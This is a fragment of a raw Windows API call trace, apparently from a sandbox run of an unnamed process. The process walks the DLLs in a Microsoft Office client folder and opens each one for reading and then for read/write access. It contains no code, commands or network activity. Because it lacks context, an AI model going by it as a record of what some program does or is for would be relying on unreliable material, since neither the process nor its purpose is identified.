RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0099.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0099.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0099.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0099.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.841] AreFileApisANSI () returned 1 [0099.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 80 [0099.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0099.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.841] AreFileApisANSI () returned 1 [0099.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0099.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8c650, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll") returned 80 [0099.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.842] GetFileType (hFile=0x368) returned 0x1 [0099.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0099.842] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.842] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.842] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.843] CloseHandle (hObject=0x368) returned 1 [0099.843] AreFileApisANSI () returned 1 [0099.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0099.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8c8f0, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll") returned 80 [0099.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.843] GetFileType (hFile=0x368) returned 0x1 [0099.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0099.843] CloseHandle (hObject=0x368) returned 1 [0099.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0099.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.844] AreFileApisANSI () returned 1 [0099.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0099.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8ce30, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll") returned 80 [0099.845] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0f9426a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0f9426a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd139a18a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0)) returned 1 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0099.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.845] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0eaf4e3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0eaf4e3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd11d067c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5ac0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-runtime-l1-1-0.dll", cAlternateFileName="AP8F34~1.DLL")) returned 1 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0099.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0099.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0099.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0099.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d178 [0099.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0099.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.846] AreFileApisANSI () returned 1 [0099.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 80 [0099.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0099.846] AreFileApisANSI () returned 1 [0099.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0099.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll") returned 80 [0099.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.847] GetFileType (hFile=0x368) returned 0x1 [0099.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.847] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.847] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.847] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.848] CloseHandle (hObject=0x368) returned 1 [0099.848] AreFileApisANSI () returned 1 [0099.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0099.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8cd88, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll") returned 80 [0099.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.848] GetFileType (hFile=0x368) returned 0x1 [0099.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.848] CloseHandle (hObject=0x368) returned 1 [0099.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0099.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0099.849] AreFileApisANSI () returned 1 [0099.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c500 [0099.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8c500, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll") returned 80 [0099.849] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0eaf4e3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0eaf4e3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd11d067c, ftLastWriteTime.dwHighDateTime=0x1d327e7, 